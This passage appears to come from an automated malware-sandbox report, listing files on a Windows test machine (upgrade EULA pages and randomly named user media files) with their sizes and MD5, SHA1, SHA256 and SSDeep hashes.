SHA256: c3131fa8bf36c31db9f2a786bc212046cb494f9c4f683ecd9042adf03425fe1b
SSDeep: 6144:MQQxxSoVsUqJVy0tpHYL6lzYcH8wx3a6ip3oCeVz/:M1soeUqJNta6lMcjda6yolL
False
C:\Windows10Upgrade\resources\ux\EULA\EULA_ar-sa.htm 108.61 KB MD5: 89af02db1d722a14787a092316dd7f37
SHA1: 2503e44903b737d39ab51ffd75285dc353362bb0
SHA256: d4db4142bf38658d3f67faf00e17883c4368432203ef56e67bd56919dc482a41
SSDeep: 3072:r+OHen+d9jpxViJCyrspX3vIYrg5oHyLYLf/wQocaH4:ZHb1x4oyrWXfZ85oS074TcaY
False
C:\Windows10Upgrade\resources\ux\EULA\EULA_bg-bg.htm 248.27 KB MD5: e5378bdae9d7f2b1e009a1a786f60874
SHA1: 2fb08f72cb9ad9e431b0a3a08b6aa6cd672f0031
SHA256: 00687167ce6d2b2df60b3bd843386bece4d2ddc4fdb2ac6d02e6aefbaf89c9bb
SSDeep: 6144:DbZWzcDxyfxdG1S73gUkQUtCAp5+kmv2xRuTl1Xe9ehnmb:fZXDxyf2EjgUkQUtCaA2I5e9nb
False
C:\Windows10Upgrade\resources\ux\EULA\EULA_cs-cz.htm 82.12 KB MD5: a00d219392673464c750b125e8520e54
SHA1: d509882d73d35c98df83e2b9b482784cd3b9087c
SHA256: b25bf24c18bfa34f480ea85b502b16332ef60fdb41a8d19bb7287f2b23d10d29
SSDeep: 1536:+yTYvzGk4cPq70QmTdwJwK7NtiAK+TGfuiunJDDiscUWXriDL1QgqXkGS:fTkGknPqIbTGwK//XnJaZUWXripV5
False
C:\Windows10Upgrade\resources\ux\EULA\EULA_da-dk.htm 64.41 KB MD5: 313dad35973fb3e2e961fceaf76220c7
SHA1: a947e2fc91fb19e0bfe7a19aeb71a3c1677fd4e3
SHA256: 6152d97a2f39197cd4b5ea2d472f071ca8cbe992e3219bbb9baae3e44a883175
SSDeep: 1536:GR+i2VR7Rrj1ajLYyOtSiPcBvFVW6Mn1YVCy17TVEz:GEiER7RtiMyVdTfK1KCy17TVEz
False
C:\Windows10Upgrade\resources\ux\EULA\EULA_de-de.htm 69.56 KB MD5: 38f847f0e2590e76ef4bc5149c1a1ff5
SHA1: 5acfc0c56bab53bd5a57a243796134637a49ff26
SHA256: 2eba957d7823606137d12567ca08a3f17d1c2f06b9c177a18d9b70a98225a5ca
SSDeep: 1536:N+gmglcqjchxomlb0FJ0LtNsEjTHLVOp7U9lxiumn+xcqQgnt6KSLzu/fnYX47ik:+gCrJAFCAqTr8p7Wdm+xcqQot6Keu/fF
False
C:\Windows10Upgrade\resources\ux\EULA\EULA_el-gr.htm 234.59 KB MD5: be9899d744320e5c483e1f7f537acc9c
SHA1: 17fa2f61f64a88b3e0eedba0ff7c0d419b1e550e
SHA256: b7dbf98a79ab9ef9303ef0ced79fdd2a56a92ac44a897d7b3ee11331065d6019
SSDeep: 6144:CAeUvnR2UtoqHK4IqAXh2krZAfdXoZZT46x0:CCFdAzFAV4ZN46y
False
C:\Windows10Upgrade\resources\ux\EULA\EULA_en-gb.htm 57.94 KB MD5: 81289c06d0bdc5ace1bf76dd46b59e73
SHA1: 6d4a121b030982a29346fe77311cbe944788b100
SHA256: 1d67894550ee8c5e05d34fe6c6c8091d72ea76acdb79d7d79b5893735bcba992
SSDeep: 1536:vks3gvMK988hrkOAWXsDPxeIzEm7IG/JtqzFv:8RvV8MrkXXom7hDq1
False
C:\Windows10Upgrade\resources\ux\EULA\EULA_en-us.htm 57.94 KB MD5: af280df9068feb7574b8ff557ec4cfaa
SHA1: 42e64928d485f0f13f55019b07eb72bb509e90b8
SHA256: db68d0b70cd2ec2624f42447c8314f93c4f595418c3b9bae26700f6127514d98
SSDeep: 1536:8yxtW7NHdX7rKRmlAM3zSllenn1f1XIRcJKhU:Txt8H17rKR/QGM19rKG
False
C:\Windows10Upgrade\resources\ux\EULA\EULA_es-mx.htm 68.94 KB MD5: c2fa31586984698186b97bce2e217f11
SHA1: 7d3cbf4620cb27a1f58572e362646039e52a4dff
SHA256: 3c4487e662852039d0076144a2895e012007eccf6ff00c075e96649927c83783
SSDeep: 1536:4n2BBKaQo5vj0Ap0Axsmp9ZVl9tPSNkR7YkI+NTGPCxzSwCq:4235vN++/Vl9ttPIy2wCq
False
C:\Windows10Upgrade\resources\ux\EULA\EULA_et-ee.htm 62.38 KB MD5: 524d9c01fd51717d3ec94bb60e1f8d91
SHA1: b3cefefc6f198f22582e944de5e80f94cf1cc317
SHA256: 58b3dd7d4c0f166cf774452ab73840d96891581ec49af004b4b67bddf082f9d1
SSDeep: 768:PMnJZJeJ0TLmva5TtrYh7qEokMieHK2Yvmt8hzutD80EsVxXHI4xo1ExTtpinnW9:PMJojvi2TCMmS9mJEsLXHRviJ1GpyO
False
C:\Windows10Upgrade\resources\ux\EULA\EULA_fi-fi.htm 69.84 KB MD5: 40969919f48e1e54693b672fed36b820
SHA1: 181f2d5d20bc8c626d3c4c18552075fc516d3401
SHA256: b35e7892c34c1ebd68400ca1a02fe570bf56e172f8c71c7a25ecd1d51d9a6604
SSDeep: 1536:jd2tr0jmnsOiplBXPJLO8F3wP1WKlnc/yVZLM27yd3sef7:B2jpiVlO8FAP1WKCy7M2OJD
False
C:\Windows10Upgrade\resources\ux\EULA\EULA_fr-ca.htm 68.52 KB MD5: 33dd936df2678bf4b69c3dee102494cd
SHA1: 9f2152509937588d4355ad8270eb76e235830107
SHA256: 06b1e03a900f692e71a92b52f2bd09766dfb12b3c640430477eb6d21a29c369d
SSDeep: 1536:jMgmaugVeyN8RFHVklsZmuZliAOImdsUwrfsxb:jXeg+928tZlFO65fsxb
False
C:\Windows10Upgrade\resources\ux\EULA\EULA_fr-fr.htm 68.52 KB MD5: ed3e4d5526f37eeebc3795f3f60d84c9
SHA1: 07152148797ac5d2113661ebbca07971ef1aebe7
SHA256: 2f7f88240f595680e7bab2b09f90cd28edb76698d76c810181e302723843ee25
SSDeep: 1536:SgpaNMLxU/g3IeQ0rM5ZE7IK1lWKNjAYa:SIw4YDAaeNW8m
False
C:\Windows10Upgrade\resources\ux\EULA\EULA_he-il.htm 845.14 KB MD5: 9bf801a4d0bae94dc7ca2b3de0351c15
SHA1: e421d3c188bda1d0a5310841b6ccaa6e9e94c7cb
SHA256: 65ea7a1e612b5e3dcc80ce86f353a8b210cbc421844745c4aee37917fcdf072b
SSDeep: 12288:dGPhbFDMD9SnjshTS5bvdy8loUfa8DAJYDzdt3PKmjQBpOpYBLqedNp7Q:d2xFKQAlS5Ddy83SG3fdt3SEpYdqO8
False
C:\Windows10Upgrade\resources\ux\EULA\EULA_hr-hr.htm 64.11 KB MD5: a7d70abf0537b322c856576dad76edb0
SHA1: 6ffcb532f914fefd232361840ebb049d4e3f9237
SHA256: efc01e01008bd30bee7168351ace19974c268a94b4046560e71e7a0b023ca4c7
SSDeep: 768:zgi/P00oqWBdHU+2Zd8ZlYAd5ZLMB2QD/Dm43qn08zrug+aayrxWTWzDVK1CW05l:zt00rPlADZLG24D4nzz+aldm8ljpQ+Td
False
C:\Windows10Upgrade\resources\ux\EULA\EULA_hu-hu.htm 83.34 KB MD5: 0e6a47ed1318c86914fa2259c3222996
SHA1: b57c27a00dc77b575a3e5177a027d2a10ec86af8
SHA256: e0341b0d7018596b764b444fcb5c63d615bc878dd99f6112e959751b1ea7c7d7
SSDeep: 1536:+TY5fh5ZvfGKCpNzPJ07o3L6ooEWi6iv+Sbsoaqe00bjD05JHETPC/u22lgoSpz3:+M5fhv3GlzSq15L6i1Ijr00I5JETPC2q
False
C:\Windows10Upgrade\resources\ux\EULA\EULA_it-it.htm 68.61 KB MD5: da76c1e23b397fb341f32f11ff49d3fc
SHA1: 88bf924759b80ec7513397765abb326f30c471c6
SHA256: 3bd0aa5e7506b0d05a67c9c7d36880cae176c5305bb67c9d355fbaf17fe10335
SSDeep: 1536:UFDwozrQs3kbejdlR2n1Fuqd5rY8E3tDdLE0oQmvTRN/hFI58FsARZpFjQ:qDwmr9bu3ug5CDw9rXTEARZfQ
False
C:\Windows10Upgrade\resources\ux\EULA\EULA_ja-jp.htm 206.08 KB MD5: 8d4ba73f775e8f4a9b3c889988c97dbf
SHA1: 648bcd2dd31374ec236988f2ef9754e82816f6f0
SHA256: c6a47c172a285a9cc7d9203f9d57f5df488653968a813b8c12dfa597d935e4c7
SSDeep: 3072:6g7cGdiG36FTPiMw3YvJwZyK2xeP6JDUDnvy9DUhy2Xga5AXkLVvrZvnV:6gkG36Rav3wawtxecUTsDUhbQtkhrVV
False
C:\Windows10Upgrade\resources\ux\EULA\EULA_ko-kr.htm 619.98 KB MD5: 6b24ae85259b5e22358b857c4783343a
SHA1: 0ef00c7fbd0ed312f0c36f9fadd200da9d7bb997
SHA256: 16dc096541d43c023cfc3a58dcbd06cfeec5bba87b5d85d18013742cf9e9541a
SSDeep: 12288:SAM6ICG7Ey3Nj7rhPrKepGaTpgzOc1BWJqVRh8zmK7rZJQ9:SZ6ICnyx7rdObaFgjDWYVR8TI9
False
C:\Windows10Upgrade\resources\ux\EULA\EULA_lt-lt.htm 75.06 KB MD5: 9bbc8e486733faf028169f9bd7537a5e
SHA1: 464a138468368895ffd5987244e00b9e93bc6104
SHA256: c946ae58e01a515544adeaff73e6573fa38723d0932942b584499d8b5ca302c8
SSDeep: 1536:7sS9e30ESjHGDiORMrJsysounYUmj4YBuNy4D8elQ1LalJFUIPtrT:7d9e3GzA4JsthDkJBuBIeMOTF9trT
False
C:\Windows10Upgrade\resources\ux\EULA\EULA_lv-lv.htm 82.70 KB MD5: 43f793b30c309a4461d2993f8540241d
SHA1: 1c303c8312a3147538dda94432bcb6298a208c13
SHA256: acba73a1a4d423ad507708e563b936894e2c11ca6ea65c84953e6b86495806aa
SSDeep: 1536:vukcIwDyN/vAR1JU9Wbezeq3U3mxC1HfwcR1YQZ1a06mfnQhdI:94+N3m1JGD3U3PecjYwg0vcI
False
C:\Windows10Upgrade\resources\ux\EULA\EULA_nb-no.htm 66.38 KB MD5: 66a8f09c09ef5ec1b798e79671508fa5
SHA1: 0d0f0d3485c7c1f12cde195e8f6183e9962b5e4f
SHA256: bc2d9c85ca7623a0c737f6241367b31b55f5a13458d10520252572bc021e289b
SSDeep: 1536:zsNqjXiVgiqr4qVEpepeWD6OhW023qhYyK8PKr:z9jSeiqrzV+HW/HyqNCr
False
C:\Windows10Upgrade\resources\ux\EULA\EULA_nl-nl.htm 66.41 KB MD5: 9bb99e0239358ee5c2a5a0e57c87c020
SHA1: dea7df26f33b1dd4ef6ddc48540c42c1f234d793
SHA256: d32bcad00bc92a3f9a25e593aaf76f0fd5c363d4b581f721ef7acf0f9ee20fa3
SSDeep: 1536:dtxzmO8wRGBmwO7o3FFBIGBaAE1Gh14VyomxyBlecwNbI:dtxzjnGbj7eKLh12sClexbI
False
C:\Windows10Upgrade\resources\ux\EULA\EULA_pl-pl.htm 80.66 KB MD5: 4c070e3b6862a3eafe47722e9037e31c
SHA1: 08dc129535be52cffe21af0fc4e3ee354689124d
SHA256: 5e712c9cf4b944552abd8d19d5b13b6270a58d9ee7cc1672d1aa0a9db8ae0c60
SSDeep: 1536:v3vJNOovdanYRuRZ3msJGm8k2imImgWQliw5UiNc+fk6eS:pNOAd3MYfkKGJwOU3+ftb
False
C:\Windows10Upgrade\resources\ux\EULA\EULA_pt-br.htm 67.45 KB MD5: a6636c8923c3f84276c6f38e32e6c1c0
SHA1: 044800749912dcd034655323cb690c5171d8c34b
SHA256: b4cc5cd1bdaf8be0b6cedfd0c6fb9ca65e6d6195a960a9b6b3a3455973470686
SSDeep: 1536:HFa0rFxxuNDElAagFMVGpNMlh920H+WiW1BYnecLvis3NStzH0/j:HIMxxuNDIAay4IMz8W1Kecjv3NStU
False
C:\Windows10Upgrade\resources\ux\EULA\EULA_pt-pt.htm 70.14 KB MD5: a2cc190789586e9321ae38e2bf873ad3
SHA1: ab6356331c124f38a4c104e1aa67f23c73eedfeb
SHA256: 4a498b217244770f139a1fcd97ffe50f0c5019bd12479214b2ac2ce57308d3a7
SSDeep: 1536:4WpCYLnPqRcgYcR+WcLectkTA/voE3mDDzWPJXP5Pu:40CknPlgY0dKk83rmD41BPu
False
C:\Windows10Upgrade\resources\ux\EULA\EULA_ro-ro.htm 77.09 KB MD5: c47341b4fa9d6dfd894607d802689878
SHA1: 2a07d0f937a90dd4e5afd4658196f7249bda77c6
SHA256: 5dbff4ecc01f3b036d2c716ec9fd4b2264a285183a056a2783bc9d396569de4f
SSDeep: 1536:qgrvs0dRC3lho8OhSTmK+BuevIOjtAvP7EnJTDyvmn9KmJ7eX1B6fSxtAhs1bvZT:qevsQ03ljQGJ+chEtAv8JTDn9KvB+SxN
False
C:\Windows10Upgrade\resources\ux\EULA\EULA_ru-ru.htm 277.95 KB MD5: b40d1dac7807d1f83cdef720e9270fc6
SHA1: 994ddf71e7619c98f6aab1777cfd023d85f6170e
SHA256: f7da74ffe2be503b3bb461223ff81a42b80ac1287b703008ecdf0f8a7aa15ce8
SSDeep: 6144:Gzft9P3NFepfA2a+7ncG/KehamMKUsHHdIhmOgYGc:Gx9P3N4ZAJencGdhaTKUQIgOgTc
False
C:\Windows10Upgrade\resources\ux\EULA\EULA_sk-sk.htm 80.80 KB MD5: 1f1ff18771f714b80c910e3e780ae5bc
SHA1: 5ba6d13a600d497a64cb66078fe01cb2c42bc2a2
SHA256: 7909c002571d8d480bddd9631d5983f54013be23d19c989b61b6f039a2179900
SSDeep: 1536:kBGrqw8CAZMhwwWhJFhAd/39+c01Gm3iURS4s+7dPARPshRpWlm4DJp0AKl:9rqwKCGHrAR9+c6GGiUrx7CRPshWtdpk
False
C:\Windows10Upgrade\resources\ux\EULA\EULA_sl-si.htm 65.36 KB MD5: ce323330cee9ff33e3c45722b2a9a6a8
SHA1: d478c168a0f22f6053bfa07df8cb4aa2198e86e3
SHA256: af2de489791cf2eebbcbc9003145e1de4e59f50edef61ac769e42f4b42e5caa4
SSDeep: 1536:muVsKiG1to/o4A7wCG8dTmXHrQJVXkEWn/yBRQ0Una5MXQSb3S:muf/wo4A3GSmXLQwIUnaqXQSbi
False
C:\Windows10Upgrade\resources\ux\EULA\EULA_sr-latn-cs.htm 74.53 KB MD5: 24be62e097f1373e11846987b0e6d1ad
SHA1: 9474950ad0e34af4ffe10bfb812d9d42dea724d2
SHA256: 986218f481250d0d2ca39da5d52ebd33b8ed7c59dc8e651f6d9fc27dacf102bb
SSDeep: 1536:F1wvdg6lFCs4L7jYBn3423Ks2SvsKJUzIiMc+uCFuZOpYs0D87tw0O6:F1wDlEdHY9sSv7NiX8F8OpY387XO6
False
C:\Windows10Upgrade\resources\ux\EULA\EULA_sv-se.htm 69.50 KB MD5: 62d13b4e30495112d08a0b5153452576
SHA1: 0baf9bf0cc3ebe58701d3db5849ab52e2fc68388
SHA256: 8204c5f45a4831771440e1191c23626e12817786952fa4d90a6a1660fe0c48ce
SSDeep: 1536:sh8tynzCkmJj9qE4fnP6dBW95tNaiCp4IOB8bAOOiopUdA8o5q:sh8tynzC9qLfy0hk4kbAOOhycU
False
C:\Windows10Upgrade\resources\ux\EULA\EULA_th-th.htm 248.95 KB MD5: 7fd0de221716b14f7e467df77078b3de
SHA1: 491fa05c3e723300ef3f70126f19842d386cb65a
SHA256: 1400b58da2824043e4fe0690cc7f64a26023eba3feeafdc899b1ed1386d86ab3
SSDeep: 6144:lGDxNLeidBLWxBCMSbcw6bVzAPavXOg4PjVAz3htlbih5xu:ML9PLuEHcbVzACvX5sE3htl+h5xu
False
C:\Windows10Upgrade\resources\ux\EULA\EULA_tr-tr.htm 74.14 KB MD5: 4bd9e5abb9f327b129f941e535a07078
SHA1: 67f2c6765a18102a09160900bbafde044a565c9f
SHA256: 17cbda15ea31f57d15a54c5840b43bf02c0a24814b88d323a1b04e3e4beb267b
SSDeep: 1536:eu5Db8L+kRPn2vjzYL0Ca/S1g46mUucHpsI3sX0G6w+8suLJG:Lb8LFRPSjEL085qvreeiG
False
C:\Windows10Upgrade\resources\ux\EULA\EULA_uk-ua.htm 261.23 KB MD5: 635faa02d08c9e9e97e9ebb486b2581d
SHA1: a170080ea7137de9147fb76ef80eb251dd752df3
SHA256: b6803ded15fefaff62ae2193cdc92f2ea4289e99560beb1eaf221de8d19e6e86
SSDeep: 6144:4iAx86TX7nMtoUTUHwhr75ocBv3aafvMbTHBpgz:NAVMqUoHSfBv3a3bThy
False
C:\Windows10Upgrade\resources\ux\EULA\EULA_zh-cn.htm 124.05 KB MD5: a6e09e4555575c4bc101e9297b5d25fc
SHA1: 2532f7be94417cffc07b6d79ffc0c9527bfc7c37
SHA256: 6675d2b505381fe9b00764ecda4a3a01c79638b68d15a225f34ea5f0aaa0fa61
SSDeep: 3072:Kf5dcfFhJo3akyKayfpykX+Vi7HF6jReQfYBH9:4q/2ByKaqpRpjwrG9
False
C:\Windows10Upgrade\resources\ux\EULA\EULA_zh-hk.htm 144.45 KB MD5: c36235262714f86ad3cfa37ff5f8d386
SHA1: d784b0b8a458b5f22e2ae1ca521db6c47de406da
SHA256: 06ffce707bccf0538fa06de5b39c0f5ac4bf55af25cfbc81006ffb981e504d30
SSDeep: 3072:LUR15T/fpsLfAmoNIt3M4Os83hk1BKeF6DsfslBhU2LNhWv:wR1N/CfKmfZ1BKectDhHhQ
False
C:\Windows10Upgrade\resources\ux\EULA\EULA_zh-tw.htm 144.45 KB MD5: b1a3e471266d0bbac90898a61883ad80
SHA1: 06c5bd4dba3ed22c926d24a701fc19a42e2413b2
SHA256: 58a65be16aa0948a0e9e9e9a6e650d8256fb678265dfd4860da21d98e8c973b0
SSDeep: 3072:eCm1z8elAEIgF73eaDLDKHcBmPTi9aRD4Nz6TrNBKBGlo7o2ZKyeMZu:eCgzweegLDK8Bmugg6TrKH7R9PZu
False
C:\Windows10Upgrade\resources\amd64\hwcompat.txt 72.17 KB MD5: e4a1a973ac4acdfdf5b2bc7f7f3bb772
SHA1: 0cf15d6819e76b9a26ed2c07a4acb19a613c8ea0
SHA256: d370e7278f112f60273cdf02747bc275d65bfdbd8d3a96e52f6bd5ed511d2d93
SSDeep: 1536:V3/zWsmqMVQkIuR1HndsDIj4UQ2gMUGNbxQyRbQ0yt38Zi70K:JmLV7IW1HndsK4U3NUGJNK34K
False
C:\Windows10Upgrade\resources\amd64\hwexclude.txt 3.02 KB MD5: 3fe86c5725a786b9d4698401e279d2cc
SHA1: 2ac869bbc6eae34bfdb2ae2f6dff45f9bbf5cf51
SHA256: 5ecde37d07b3d262fb85d2b392d535d8b9604587d2f99aacd3bcbd85c8293614
SSDeep: 96:BDcHZzT6M5rnyRfqZ3Bbf+ZQOLgPUxGMFj2M7Nvf:BDcH16MdnyQiZXLgwGyj2Mlf
False
C:\Windows10Upgrade\resources\amd64\nxquery.inf 2.22 KB MD5: 12855245f42686b91dd9e667a438aadd
SHA1: 189a61fb49fe8b756181501ae08bca36b62b364b
SHA256: bbce12c6795731d7f60ba4a5881bfe21bc9abbbcc4d4cd36fa9e74ed70deebc8
SSDeep: 48:0ZViDEHGMIjCj7aaM4Md0NwGft+s0LMmun9vHM7Nvf:ssDZQP258pEsiMmm9fM7Nvf
False
C:\Users\FD1HVy\Videos\54be.flv 35.00 KB MD5: f31a5f07d189bc178cebbef699ec8462
SHA1: d07c13668df0ab1614287a00d27f788e19f35fac
SHA256: d5252484b84ae73754808ec524a9713f769467198fc8dab6a09b056c473a8b26
SSDeep: 768:08HSaX416vgkIunP+WVgzSTyX2VSwJkVKhYKn+sLmJFh7tttgqt:Jx4cvgVlWVgzXiTkowsKJFJj
False
C:\Users\FD1HVy\Videos\tKr\W681BwserRy_0.avi 80.30 KB MD5: d000bf70b783921ddf815a82b1a66ab8
SHA1: 6021260eae78c66c7bd983f159aa5c0e917a9f8d
SHA256: e3328aff0fb0aeb9f648d4ecfb4502ebea0b131c9722fc265ca7c0a0e49fdc11
SSDeep: 1536:FvAZZXeTCnoq7W6YdzRWZqRMWaLe3A9nS7yMfK+o5W7PiS:FvAZZXeMn6TdzkajfYYiS
False
C:\Users\FD1HVy\Videos\Mr9We2Kb5L1oUgPF84r\l0I0AT.swf 100.23 KB MD5: 6eb7ffddafe900c58e0dae2e63610a54
SHA1: 80b3f200c5847511b9bd48bed6be0b7f39e5e30a
SHA256: c4fbd9bff33479cd285ac767e969961ba63f2747c06cc726f6be6713318e48e9
SSDeep: 1536:+TnhXTlXlU2C4OaEYf1AneT/MvkrPolu2HImN0BDfptFW1NmqJYjmTpCsiwgiC6M:unJxKr4UQj/MKPCu2oN/W1NoC+wgMgbP
False
C:\Users\FD1HVy\Videos\Mr9We2Kb5L1oUgPF84r\_cqQP-g.mkv 90.12 KB MD5: f843b6adcf221a7228edb7b197111002
SHA1: 625905576fc0415dc9537593c1d62b32de43067a
SHA256: d303da25b267baebdffd9348babc4ab6050f45dee8d38eee819c41662ab7a680
SSDeep: 1536:TfNoHTEE2i3xetQ/Im85pJP7A0xX1I0xRRlJmEdQMw/u3U7bBWWe/ndUW5/NsDMH:TYTEE2mIm83JDA0xFblJBQMw/h7+NsMH
False
C:\Users\FD1HVy\Videos\kyLFwyj3y_- AKUbu7HT\JPgmUVeD.mp4 40.70 KB MD5: ef749be737833c6b1f8ccba41d39681a
SHA1: a61f5961a2891c7ece7b5e170c82953036be4cbe
SHA256: 869ebab2f64ae42d4d2475a33a197a80e316e595d5ae521885542e5f91978cfb
SSDeep: 768:rOa6qnlsY0rXHDEjWvnLikJzKLTTWoplEg0CnqWAzr6:rYqlstzjEjKLiZpuCqWAn6
False
C:\Users\FD1HVy\Videos\kyLFwyj3y_- AKUbu7HT\Ui7VnDgLzhug.flv 12.25 KB MD5: c0acce423710a09ff1baa6b48f89e014
SHA1: c1dcc23f9bc9dcf6adfc839c9742261d9e732e9c
SHA256: ba88bd3fc54ad1eef38e27b2a3424ed12fed056595798c36450baca2824a9610
SSDeep: 384:8AJJC9JuGMnTrepF990ZF0hgN+iAFHGFVBv3+:HJY9JuBm39WF0aNMGI
False
C:\Users\FD1HVy\Videos\kyLFwyj3y_- AKUbu7HT\VuG piDpw9ji.mkv 67.25 KB MD5: b709cd86f91e90a7e9de07f569b8b6cf
SHA1: 4af528239ad9b2419c28ceea55e2f52bc798ed23
SHA256: 59da137360d6d60a006a9f4494e353d4089c6c24f0c143482f1e595ef9986fee
SSDeep: 1536:qqiDEtppiq5RcauxWmFUPg7dnZMWrNW8sEnD4xIW15C:qqiDE+qd4Wx+XrNW8sqD4xIk5C
False
C:\Users\FD1HVy\Videos\kyLFwyj3y_- AKUbu7HT\znnVwfJyK03KyEgu5yk.flv 84.27 KB MD5: 0eac227c14aead7d1c71ce145e8c8909
SHA1: cc45139c67c88c95411f4f6548ca40b3be8eec94
SHA256: f15a59aed7cf9e06828862056a6d0060826598de98584371f1a2e14af95c3b9a
SSDeep: 1536:aGKeI92GPaOwD9iJ+QFzCP1m8E/dMuU7vBHfCpC/GvumTE8ChqXar7OS:aGKeI92c/wU7mO/SV7pH//4umTEHkS
False
C:\Users\FD1HVy\Videos\Kagr0\G50GPz.flv 95.14 KB MD5: b37d26f0692e6226ac10eeeb2ee92945
SHA1: 8a235594daedbb5c70470e8b09b01b44e6dd3529
SHA256: 481a230a82407276c74443b722287cb2814839efffabc22c2ab5d624a8e8b246
SSDeep: 1536:PuRclt7aLhrkZDToDr8HdglT0JdDCFH3oB8xEoDUFzSX+GC0Y828/Dz89KWsOD9Y:Mmt7PBQsg+6FHOsyFzSuGC0Y+Dz8Qb0i
False
C:\Users\FD1HVy\Videos\Kagr0\tRYgRmfMiyo_fA kpl4-.flv 33.69 KB MD5: 8c1a345c3e50922964db21287d1e2499
SHA1: 93fe96d872e46be8600974587ff53daed4c5b9c3
SHA256: 0399482cd3582b3514fc70ce2b2d27eecb1c1fc9b4dc29c1494859e7f638cf1a
SSDeep: 768:bXGiGT9n7uPSYlSVD8NboRoGO5eBb1+G9lfAB2Arp0m2AAyQdzyY:b2iEF7AIVGER3O5E5+S9AB2O6AXYzyY
False
C:\Users\FD1HVy\Videos\IGecK\Dl_2E.mp4 83.97 KB MD5: 981baffca8b068fca7ad634ce31b1aa4
SHA1: c1cbc895089c2170abf66f985619ddc2ff3820a0
SHA256: 51151ae940b4ee2f9f877c67c159c3f2e80f2ee7f071483edaa4d59b50f81029
SSDeep: 1536:PqQk3eeqkJj1kx0V6M0dj84LSpXOFdcBt63lSMXwcyzaHPmp3cT1liDG26d:PGuevJd6m4wXO8FMX1PvCcFF
False
C:\Users\FD1HVy\Videos\IGecK\tPmIDjSq0JZ6KPmq.mp4 74.12 KB MD5: 535d4a416dc13ee2aa0dd4172ac63217
SHA1: 98b299a312b0ef87f64b404277ee226ea0b78556
SHA256: 5044adc91c6d7744fdb7a80ff4c01e436afb3fb9a6b3bb33e24fa4f11785cdd4
SSDeep: 1536:hwRWPWPlsxPpVGCnJZ/WqEnaV3+Dv/lQxh7acXymh+i53PR5dUcEXlIHf:hw4WGfVrnJknguDv/la+mhndpKX+Hf
False
C:\Users\FD1HVy\Videos\ahcaYgdd_uS\dIBFcA.flv 84.50 KB MD5: 0fca564fad16b30551674540d7d7a2c2
SHA1: 100d32374f7bbe9952affed382fb15f09b6d577a
SHA256: 75f400540fa724c9c1617682b9741e5eb616f81a0a63b8a69967a805889c47e4
SSDeep: 1536:1eqBRonO4Q+FsxnpPRKFGp92eegdbpafWfHIK0POGhM1wPIYIzF:gnOTfxnRkFGfegdbpFILOGC1wsB
False
C:\Users\FD1HVy\Videos\ahcaYgdd_uS\qIBn Mru7Ws.mkv 13.61 KB MD5: c65ab7aa04c89453bf076a3b151879ae
SHA1: 5ca42cf62414b21f4843f0b497b57f99e042597f
SHA256: b8dadc432ca0465728eb593ab9d6e93154cb2e947b2a10b0bac43bdf6b451c03
SSDeep: 384:F2527x0MGQRWXDKSLvKwORfi8hjMNEXEyd/chPBtN:8I0MGQODKSzYfLV/dkhBtN
False
C:\Users\FD1HVy\Searches\winrt--{S-1-5-21-1051304884-625712362-2192934891-1000}-.searchconnector-ms 1.59 KB MD5: 5746004b515a5cca1fc07c8188e65b75
SHA1: a995dd198f0422264bacf978c6e03dd1543774c0
SHA256: 76ee50893c4e45ea76d3aac47ff78603a0d2639490d97e56ac999c5a05615c6a
SSDeep: 24:cElKWFj/u7N7Eing1cf2vd9HtJiaGhCdkeA9dxVZVZMLUmOt3W9+93LnszrS8GPP:0c/igH/HoKaxVZVZMLHM7Nvf
False
C:\Users\FD1HVy\Pictures\0E0w6TbFOV.gif 45.09 KB MD5: 244ed5ffab35dbe6b98d30245d18450a
SHA1: 802fbc1a8f7931d4df202521076f27c3a2b11004
SHA256: 299f617b86bd4db7a0e513fff20b2dea4beec9bf66042a3716f7485ec33ee7a1
SSDeep: 768:uYS36G+dkn1tU5L7Lmpi3ySAzScWluQfa17t87tRqSKPO5T8HtZokVWE:VTm1tePC43Iuc76a1Z8hjKPGTgZ9T
False
C:\Users\FD1HVy\Pictures\0Y8YAfgHZ37VsZ3R.bmp 61.67 KB MD5: 7a3141e18a24ef641aa5612888f6b0c9
SHA1: 227971abd535e24a91c4f4bfad7c31f5450c3ee3
SHA256: 11e9f3211d1b733c5c2b39ac6db2a27f50c4078d5258946e8e46299bf18edf0d
SSDeep: 768:NOjIMYAitHI4qqPFzfHDuXYam7x5o31kTEClkv/4TG+vpugUH57O3HzklvpQ5bJ9:Nxfo4rNfHSejW6hKvQjugUcp5duSMC
False
C:\Users\FD1HVy\Pictures\1XaE_kKDx5.gif 52.83 KB MD5: 6c2c1294b750f755267b6eaa81ab6ed8
SHA1: b2f75acaac04d3d8241ccd0f4061ca23a24f2004
SHA256: a52faf0df83a13d0f2ce84430f81df945514c9fe0f974fec13881d08d55ffb23
SSDeep: 1536:MGb7DfoUxDcQVDclMBxpN0Oqy7N/DJFIgji5wU3Qh:MK3OAclyxv0kxHjtU0
False
C:\Users\FD1HVy\Pictures\5e7Wc.bmp 93.83 KB MD5: fe5efebb347ea5d47839bc13233859c5
SHA1: 3e128ec93e60dade8c4b6a91a47be2a1fdf785d1
SHA256: c0d535e0de061e101aad5a26a2a5daf51195085f8c0ad858121aa2b6a180c316
SSDeep: 1536:9+Mu8gRCvmaBhqkMkTHzjotc/O7vAFBzsBcmOazpWx33h0sWSQX13k:g/8gRCvVBhqkvkWm8gBfDSQX13k
False
C:\Users\FD1HVy\Pictures\5NeoW1fKEkQU.jpg 45.86 KB MD5: 4a7b096d240300df7a99ed1367464882
SHA1: 883171801a4890415f8f5844353f3a933ccf172d
SHA256: cf36213217f319ba7913fba94bdb3306529081bb423ad7f3d1c4f1db6bc4bc65
SSDeep: 768:1U0lbSU1vQtea1vvcalyygeaIhm2jz8cLD3WftgR2/1LjYfoxQhNUF1dFhx:BlvKYa1vkE9h5z8WDGf2iigx2NULn
False
C:\Users\FD1HVy\Pictures\7ZNXracFupquDdAVyh.png 78.45 KB MD5: 6c35b068d01dc82542963c0635273d04
SHA1: 0cd4bee445212af0825176cf85e3dca67f2c4b38
SHA256: eeb757525bdd95ca1a974a4795f4ba1c2a053c7f841bd2df26ee6193fd1d947c
SSDeep: 1536:XX4l+1SvQ4Ra4KtZ1+XW8cS5I0q6uRTVfsA9krIwfLud1q1Lmwh7ZC18j3Y4n1su:Yl6URktZuWLSyjpALgKHS18DKEyFDNg
False
C:\Users\FD1HVy\Pictures\AMY25182fq.jpg 9.09 KB MD5: aff886262e7194cff528d16ec8eb1aaf
SHA1: 1ec96364db88130757dcc8e189bd0fbcd7ac09cf
SHA256: 104746bb0d9f5b3301974477bdf2bc442ddaeddaa88ad3acd54c918be53a2687
